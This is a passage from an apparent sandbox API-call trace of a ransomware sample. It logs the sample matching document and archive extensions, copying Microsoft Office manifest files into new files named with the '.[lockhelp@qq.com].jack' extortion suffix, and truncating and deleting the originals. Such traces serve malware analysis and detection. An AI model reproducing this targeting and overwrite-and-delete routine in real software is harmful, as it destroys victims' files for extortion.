(lpString1=".pdf", lpString2=".xml") returned -1 [0205.512] lstrlenW (lpString=".xls") returned 4 [0205.512] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.512] lstrlenW (lpString=".xlsx") returned 5 [0205.512] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.512] lstrlenW (lpString=".ppt") returned 4 [0205.512] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0205.512] lstrlenW (lpString=".zip") returned 4 [0205.512] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.512] lstrlenW (lpString=".rar") returned 4 [0205.512] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.512] lstrlenW (lpString=".bz2") returned 4 [0205.512] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.512] lstrlenW (lpString=".7z") returned 3 [0205.512] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0205.513] lstrlenW (lpString=".dbf") returned 4 [0205.513] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0205.513] lstrlenW (lpString=".1cd") returned 4 [0205.513] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0205.513] lstrlenW (lpString=".jpg") returned 4 [0205.513] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0205.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0205.513] lstrlenW (lpString=".doc") returned 4 [0205.513] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.513] lstrlenW (lpString=".docx") returned 5 [0205.513] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.513] lstrlenW (lpString=".pdf") returned 4 [0205.513] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.513] lstrlenW (lpString=".xls") returned 4 [0205.513] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.513] lstrlenW (lpString=".xlsx") returned 5 [0205.513] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.513] lstrlenW (lpString=".ppt") returned 4 [0205.513] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0205.513] lstrlenW (lpString=".zip") returned 4 [0205.513] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.513] lstrlenW (lpString=".rar") returned 4 [0205.513] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.513] lstrlenW (lpString=".bz2") returned 4 [0205.513] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.513] lstrlenW (lpString=".7z") returned 3 [0205.513] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0205.513] lstrlenW (lpString=".dbf") returned 4 [0205.513] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0205.514] lstrlenW (lpString=".1cd") returned 4 [0205.514] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0205.514] lstrlenW (lpString=".jpg") returned 4 [0205.514] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.514] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.514] lstrlenW (lpString="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 53 [0205.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0205.514] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=1261) returned 1 [0205.514] CloseHandle (hObject=0x3b8) returned 1 [0205.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml")) returned 0x220 [0205.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0205.515] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.515] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0205.515] GetLastError () returned 0x0 [0205.515] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0205.573] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0205.574] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.574] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.574] SetEndOfFile (hFile=0x3ec) returned 1 [0205.574] CloseHandle (hObject=0x3ec) returned 1 [0205.574] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.574] SetEndOfFile (hFile=0x3b8) returned 1 [0205.575] CloseHandle (hObject=0x3b8) returned 1 [0205.575] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.576] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml")) returned 1 [0205.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0205.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0205.576] lstrlenW (lpString=".doc") returned 4 [0205.576] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.576] lstrlenW (lpString=".docx") returned 5 [0205.576] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.576] lstrlenW (lpString=".pdf") returned 4 [0205.576] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.576] lstrlenW (lpString=".xls") returned 4 [0205.576] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.576] lstrlenW (lpString=".xlsx") returned 5 [0205.576] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.576] lstrlenW (lpString=".ppt") returned 4 [0205.576] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0205.576] lstrlenW (lpString=".zip") returned 4 [0205.576] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.576] lstrlenW (lpString=".rar") returned 4 [0205.576] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.576] lstrlenW (lpString=".bz2") returned 4 [0205.576] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.576] lstrlenW (lpString=".7z") returned 3 [0205.576] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0205.577] lstrlenW (lpString=".dbf") returned 4 [0205.577] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0205.577] lstrlenW (lpString=".1cd") returned 4 [0205.577] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0205.577] lstrlenW (lpString=".jpg") returned 4 [0205.577] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0205.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0205.577] lstrlenW (lpString=".doc") returned 4 [0205.577] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.577] lstrlenW (lpString=".docx") returned 5 [0205.577] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.577] lstrlenW (lpString=".pdf") returned 4 [0205.577] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.577] lstrlenW (lpString=".xls") returned 4 [0205.577] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.577] lstrlenW (lpString=".xlsx") returned 5 [0205.577] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.577] lstrlenW (lpString=".ppt") returned 4 [0205.577] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0205.577] lstrlenW (lpString=".zip") returned 4 [0205.577] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.577] lstrlenW (lpString=".rar") returned 4 [0205.577] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.577] lstrlenW (lpString=".bz2") returned 4 [0205.577] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.577] lstrlenW (lpString=".7z") returned 3 [0205.577] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0205.577] lstrlenW (lpString=".dbf") returned 4 [0205.577] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0205.577] lstrlenW (lpString=".1cd") returned 4 [0205.577] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 104 [0205.578] lstrlenW (lpString=".jpg") returned 4 [0205.578] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.578] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.578] lstrlenW (lpString="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 53 [0205.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0205.578] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=1261) returned 1 [0205.578] CloseHandle (hObject=0x3b8) returned 1 [0205.578] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml")) returned 0x220 [0205.578] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0205.578] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.578] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0205.579] GetLastError () returned 0x0 [0205.579] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0205.760] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0205.761] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.762] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.762] SetEndOfFile (hFile=0x3ec) returned 1 [0205.762] CloseHandle (hObject=0x3ec) returned 1 [0205.764] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.764] SetEndOfFile (hFile=0x3b8) returned 1 [0205.765] CloseHandle (hObject=0x3b8) returned 1 [0205.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.765] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml")) returned 1 [0205.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0205.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0205.766] lstrlenW (lpString=".doc") returned 4 [0205.766] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.766] lstrlenW (lpString=".docx") returned 5 [0205.766] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.766] lstrlenW (lpString=".pdf") returned 4 [0205.766] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.766] lstrlenW (lpString=".xls") returned 4 [0205.766] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.766] lstrlenW (lpString=".xlsx") returned 5 [0205.766] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.766] lstrlenW (lpString=".ppt") returned 4 [0205.766] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0205.766] lstrlenW (lpString=".zip") returned 4 [0205.766] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.766] lstrlenW (lpString=".rar") returned 4 [0205.766] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.766] lstrlenW (lpString=".bz2") returned 4 [0205.766] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.767] lstrlenW (lpString=".7z") returned 3 [0205.767] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0205.767] lstrlenW (lpString=".dbf") returned 4 [0205.767] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0205.767] lstrlenW (lpString=".1cd") returned 4 [0205.767] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0205.767] lstrlenW (lpString=".jpg") returned 4 [0205.767] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0205.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0205.767] lstrlenW (lpString=".doc") returned 4 [0205.767] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.767] lstrlenW (lpString=".docx") returned 5 [0205.767] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.767] lstrlenW (lpString=".pdf") returned 4 [0205.767] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.767] lstrlenW (lpString=".xls") returned 4 [0205.767] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.767] lstrlenW (lpString=".xlsx") returned 5 [0205.767] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.767] lstrlenW (lpString=".ppt") returned 4 [0205.767] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0205.768] lstrlenW (lpString=".zip") returned 4 [0205.768] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.768] lstrlenW (lpString=".rar") returned 4 [0205.768] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.768] lstrlenW (lpString=".bz2") returned 4 [0205.768] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.768] lstrlenW (lpString=".7z") returned 3 [0205.768] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0205.768] lstrlenW (lpString=".dbf") returned 4 [0205.768] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0205.768] lstrlenW (lpString=".1cd") returned 4 [0205.768] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 104 [0205.768] lstrlenW (lpString=".jpg") returned 4 [0205.768] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.769] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.769] lstrlenW (lpString="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 53 [0205.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0205.769] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=399528) returned 1 [0205.769] CloseHandle (hObject=0x3b8) returned 1 [0205.769] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml")) returned 0x220 [0205.769] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0205.770] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.770] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0205.770] GetLastError () returned 0x0 [0205.770] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x618a8, lpOverlapped=0x0) returned 1 [0206.102] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x618b0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x618b0, lpOverlapped=0x0) returned 1 [0206.109] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0206.109] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13e, lpOverlapped=0x0) returned 1 